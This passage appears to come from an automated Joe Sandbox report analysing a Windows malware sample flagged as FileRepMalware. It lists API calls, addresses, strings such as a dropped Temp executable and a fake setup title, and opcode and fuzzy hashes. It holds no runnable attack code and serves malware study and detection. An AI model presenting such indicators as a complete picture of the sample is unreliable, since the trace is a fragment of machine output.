                                                                                                                                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040451F
                                                                                                                                                                    • Part of subcall function 00404678: lstrlenA.KERNEL32(0042A0A0,0042A0A0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404593,000000DF,00000000,00000400,?), ref: 00404716
                                                                                                                                                                    • Part of subcall function 00404678: wsprintfA.USER32 ref: 0040471E
                                                                                                                                                                    • Part of subcall function 00404678: SetDlgItemTextA.USER32(?,0042A0A0), ref: 00404731
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                  • String ID: mo$"C:\Users\user~1\AppData\Local\Temp\xheuzyg.exe" $A$C:\Users\user~1\AppData\Local\Temp$I|o
                                                                                                                                                                  • API String ID: 2624150263-155280400
                                                                                                                                                                  • Opcode ID: 3f80b46dd096fd368bede20d2bfb79225146288fd6115dbd0f947cd12367bd25
                                                                                                                                                                  • Instruction ID: 171edb992a826102812884c43759f415235567a44aa7ca021352bae990107689
                                                                                                                                                                  • Opcode Fuzzy Hash: 3f80b46dd096fd368bede20d2bfb79225146288fd6115dbd0f947cd12367bd25
                                                                                                                                                                  • Instruction Fuzzy Hash: 6CA16FB1900208ABDB11AFA5DC41BAF77B8EF84315F14803BF615B62D1D77C9A418F69
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • CoCreateInstance.OLE32(00407504,?,00000001,004074F4,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020A6
                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409438,00000400,?,00000001,004074F4,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402160
                                                                                                                                                                  Strings
                                                                                                                                                                  • C:\Users\user~1\AppData\Local\Temp, xrefs: 004020DE
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ByteCharCreateInstanceMultiWide
                                                                                                                                                                  • String ID: C:\Users\user~1\AppData\Local\Temp
                                                                                                                                                                  • API String ID: 123533781-3107243751
                                                                                                                                                                  • Opcode ID: 0f4e10af4ab318a31e6fcfc6a713dc1191477b15d05add315443f5ab89249dcc
                                                                                                                                                                  • Instruction ID: 8f67ba42191d57eba63015a6e8d0bffc44353c0eb35145c2afa1481ff4163fd5
                                                                                                                                                                  • Opcode Fuzzy Hash: 0f4e10af4ab318a31e6fcfc6a713dc1191477b15d05add315443f5ab89249dcc
                                                                                                                                                                  • Instruction Fuzzy Hash: 2D414C75A00205BFCB00DFA8CD89E9E7BB6EF49354F204169FA05EB2D1CA799C41CB94
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402680
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileFindFirst
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1974802433-0
                                                                                                                                                                  • Opcode ID: 210d19403dc9ad4312224203accd8d1f3ff27f6c6522c4c2c719f15252d079a4
                                                                                                                                                                  • Instruction ID: d100cd6159f555773fbda265320c1ac67d2490096a0530dc8ee4140695772295
                                                                                                                                                                  • Opcode Fuzzy Hash: 210d19403dc9ad4312224203accd8d1f3ff27f6c6522c4c2c719f15252d079a4
                                                                                                                                                                  • Instruction Fuzzy Hash: 24F0A0326081049ED711EBA99A499EEB778DB11328F6045BFE101B61C1C7B859459A3A
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 54d80564fe19f3f3404c6606d58c011d861cfab5a50afacd25c13b8f5d904866
                                                                                                                                                                  • Instruction ID: 2fa80b96e0c3f2f9afba8e6e6bfd5b6e13d9d39ff7e82b1c07230a33620f403b
                                                                                                                                                                  • Opcode Fuzzy Hash: 54d80564fe19f3f3404c6606d58c011d861cfab5a50afacd25c13b8f5d904866
                                                                                                                                                                  • Instruction Fuzzy Hash: 5BE1797190070ADFDB24CF58C980BAEBBF5EB45305F15892EE897A7291D338A991CF14
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: ac19822e65b9eb32b60c0006d09f593d524529e242751fff4e2df6e5f6ee417a
                                                                                                                                                                  • Instruction ID: 226139066da84df80bc4b15dd4b3e380d67d521acd3bdc5c46ce9393f3ccc406
                                                                                                                                                                  • Opcode Fuzzy Hash: ac19822e65b9eb32b60c0006d09f593d524529e242751fff4e2df6e5f6ee417a
                                                                                                                                                                  • Instruction Fuzzy Hash: 8BC13B71A00219CBDF14CF68C4905EEB7B2FF99314F26826AD856BB384D7346952CF94
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00404056
                                                                                                                                                                  • GetDlgItem.USER32(00000000,000003E8), ref: 0040406A
                                                                                                                                                                  • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00404088
                                                                                                                                                                  • GetSysColor.USER32(?), ref: 00404099
                                                                                                                                                                  • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004040A8
                                                                                                                                                                  • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004040B7
                                                                                                                                                                  • lstrlenA.KERNEL32(?), ref: 004040C1
                                                                                                                                                                  • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004040CF
                                                                                                                                                                  • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004040DE
                                                                                                                                                                  • GetDlgItem.USER32(?,0000040A), ref: 00404141
                                                                                                                                                                  • SendMessageA.USER32(00000000), ref: 00404144
                                                                                                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 0040416F
                                                                                                                                                                  • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004041AF
                                                                                                                                                                  • LoadCursorA.USER32(00000000,00007F02), ref: 004041BE
                                                                                                                                                                  • SetCursor.USER32(00000000), ref: 004041C7
                                                                                                                                                                  • ShellExecuteA.SHELL32(0000070B,open,0042DBC0,00000000,00000000,00000001), ref: 004041DA
                                                                                                                                                                  • LoadCursorA.USER32(00000000,00007F00), ref: 004041E7
                                                                                                                                                                  • SetCursor.USER32(00000000), ref: 004041EA
                                                                                                                                                                  • SendMessageA.USER32(00000111,00000001,00000000), ref: 00404216
                                                                                                                                                                  • SendMessageA.USER32(00000010,00000000,00000000), ref: 0040422A
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                                                                                  • String ID: mo$"C:\Users\user~1\AppData\Local\Temp\xheuzyg.exe" $I|o$N$open
                                                                                                                                                                  • API String ID: 3615053054-2940318611
                                                                                                                                                                  • Opcode ID: c58a0b319f6ceee57a7eba4f5dbe9c3c6e8762fb962b098a8fd1953549ce9262
                                                                                                                                                                  • Instruction ID: 220b67e7875a360065d3b56f20ed6dbf7aa7168a1850c9919f5fb7903a7ea725
                                                                                                                                                                  • Opcode Fuzzy Hash: c58a0b319f6ceee57a7eba4f5dbe9c3c6e8762fb962b098a8fd1953549ce9262
                                                                                                                                                                  • Instruction Fuzzy Hash: C861F271A40309BFEB109F61CC45F6A3B69FB44715F10403AFB04BA2D1C7B8AA51CB99
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                                  • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                                                                                                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                                                  • SetTextColor.GDI32(00000000,?), ref: 00401130
                                                                                                                                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                                  • DrawTextA.USER32(00000000,ylpuxzibyo Setup,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                  • String ID: mo$F$ylpuxzibyo Setup
                                                                                                                                                                  • API String ID: 941294808-1545505820
                                                                                                                                                                  • Opcode ID: 05bbfc508ef237e24a9817a54f4a45d084594548d285a69524b208d70469c4e1
                                                                                                                                                                  • Instruction ID: 9dd9d9e9de989eb397972ae7cf78bef649c8fbd879b4abede4b5176bd3adbacf
                                                                                                                                                                  • Opcode Fuzzy Hash: 05bbfc508ef237e24a9817a54f4a45d084594548d285a69524b208d70469c4e1
                                                                                                                                                                  • Instruction Fuzzy Hash: 08419D71804249AFCB058F95DD459BFBFB9FF44314F00802AF951AA1A0C738E951DFA5
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00405F57: GetModuleHandleA.KERNEL32(?,?,?,00403194,0000000D), ref: 00405F69
                                                                                                                                                                    • Part of subcall function 00405F57: GetProcAddress.KERNEL32(00000000,?), ref: 00405F84
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000002,?,00000000,?,?,004056AA,?,00000000,000000F1,?), ref: 00405962
                                                                                                                                                                  • GetShortPathNameA.KERNEL32(?,0042C230,00000400), ref: 0040596B
                                                                                                                                                                  • GetShortPathNameA.KERNEL32(00000000,0042BCA8,00000400), ref: 00405988
                                                                                                                                                                  • wsprintfA.USER32 ref: 004059A6
                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,0042BCA8,C0000000,00000004,0042BCA8,?,?,?,00000000,000000F1,?), ref: 004059E1
                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004059F0
                                                                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 00405A06
                                                                                                                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,0042B8A8,00000000,-0000000A,004093E4,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405A4C
                                                                                                                                                                  • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 00405A5E
                                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00405A65
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 00405A6C
                                                                                                                                                                    • Part of subcall function 00405813: lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040581A
                                                                                                                                                                    • Part of subcall function 00405813: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040584A
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeModulePointerProcReadSizeWritewsprintf
                                                                                                                                                                  • String ID: mo$%s=%s$[Rename]
                                                                                                                                                                  • API String ID: 3445103937-1993660514
                                                                                                                                                                  • Opcode ID: abd3264898386bb3dbc1ebc44b2e1273f6261c7b2a899847ebec775b355f104e
                                                                                                                                                                  • Instruction ID: 64f3c6dc45b3b00a74ff67058550f3a5a1124089509923db9c5fc79d761d9fea
                                                                                                                                                                  • Opcode Fuzzy Hash: abd3264898386bb3dbc1ebc44b2e1273f6261c7b2a899847ebec775b355f104e
                                                                                                                                                                  • Instruction Fuzzy Hash: 8941E131B05B166BD3206B619D89F6B3A5CDF45755F04063AFD05F22C1EA3CA8008EBE
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetVersion.KERNEL32(00000000,00429878,00000000,00404EEB,00429878,00000000), ref: 00405C91
                                                                                                                                                                  • GetSystemDirectoryA.KERNEL32("C:\Users\user~1\AppData\Local\Temp\xheuzyg.exe" ,00000400), ref: 00405D0C
                                                                                                                                                                  • GetWindowsDirectoryA.KERNEL32("C:\Users\user~1\AppData\Local\Temp\xheuzyg.exe" ,00000400), ref: 00405D1F
                                                                                                                                                                  • SHGetSpecialFolderLocation.SHELL32(?,0041924B), ref: 00405D5B
                                                                                                                                                                  • SHGetPathFromIDListA.SHELL32(0041924B,"C:\Users\user~1\AppData\Local\Temp\xheuzyg.exe" ), ref: 00405D69
                                                                                                                                                                  • CoTaskMemFree.OLE32(0041924B), ref: 00405D74
                                                                                                                                                                  • lstrcatA.KERNEL32("C:\Users\user~1\AppData\Local\Temp\xheuzyg.exe" ,\Microsoft\Internet Explorer\Quick Launch), ref: 00405D96
                                                                                                                                                                  • lstrlenA.KERNEL32("C:\Users\user~1\AppData\Local\Temp\xheuzyg.exe" ,00000000,00429878,00000000,00404EEB,00429878,00000000), ref: 00405DE8
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                                                                                  • String ID: "C:\Users\user~1\AppData\Local\Temp\xheuzyg.exe" $I|o$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                  • API String ID: 900638850-11988235
                                                                                                                                                                  • Opcode ID: dad9380ef75d4ee6d1e7f44bcb98c3f3aee458906992b83e7d16e4410c3c70ab
                                                                                                                                                                  • Instruction ID: 131396e9090e0f007f21196dc47e10b2e1a614011cd8a075e276219472c4ac8b
                                                                                                                                                                  • Opcode Fuzzy Hash: dad9380ef75d4ee6d1e7f44bcb98c3f3aee458906992b83e7d16e4410c3c70ab
                                                                                                                                                                  • Instruction Fuzzy Hash: EA510531A04A04ABEB215B65DC88BBF3BA4DF05714F10823BE911B62D1D73C59429E5E
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe",C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,00403105,C:\Users\user~1\AppData\Local\Temp\,?,004032B8), ref: 00405E81
                                                                                                                                                                  • CharNextA.USER32(?,?,?,00000000), ref: 00405E8E
                                                                                                                                                                  • CharNextA.USER32(?,"C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe",C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,00403105,C:\Users\user~1\AppData\Local\Temp\,?,004032B8), ref: 00405E93
                                                                                                                                                                  • CharPrevA.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,00403105,C:\Users\user~1\AppData\Local\Temp\,?,004032B8), ref: 00405EA3
                                                                                                                                                                  Strings
                                                                                                                                                                  • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405E2A, 00405E2F
                                                                                                                                                                  • *?|<>/":, xrefs: 00405E71
                                                                                                                                                                  • "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe", xrefs: 00405E65
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Char$Next$Prev
                                                                                                                                                                  • String ID: "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe"$*?|<>/":$C:\Users\user~1\AppData\Local\Temp\
                                                                                                                                                                  • API String ID: 589700163-1286990196
                                                                                                                                                                  • Opcode ID: ce236f4316dc44970b3d4854ee077085f8211c330c8e5a50d5c3ec65e4e49f20
                                                                                                                                                                  • Instruction ID: 6784d5a4761720cd8368ccbdd0638492f40d0cd734ea18b92361b53ebca16514
                                                                                                                                                                  • Opcode Fuzzy Hash: ce236f4316dc44970b3d4854ee077085f8211c330c8e5a50d5c3ec65e4e49f20
                                                                                                                                                                  • Instruction Fuzzy Hash: BA11E671804B9129EB3217248C44B7B7F89CB5A7A0F18407BE5D5722C2C77C5E429EAD
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetWindowLongA.USER32(?,000000EB), ref: 00403F07
                                                                                                                                                                  • GetSysColor.USER32(00000000), ref: 00403F23
                                                                                                                                                                  • SetTextColor.GDI32(?,00000000), ref: 00403F2F
                                                                                                                                                                  • SetBkMode.GDI32(?,?), ref: 00403F3B
